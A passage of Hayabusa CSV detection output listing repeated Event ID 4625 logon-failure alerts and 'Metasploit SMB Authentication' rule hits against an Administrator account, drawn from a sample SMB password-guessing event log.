SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
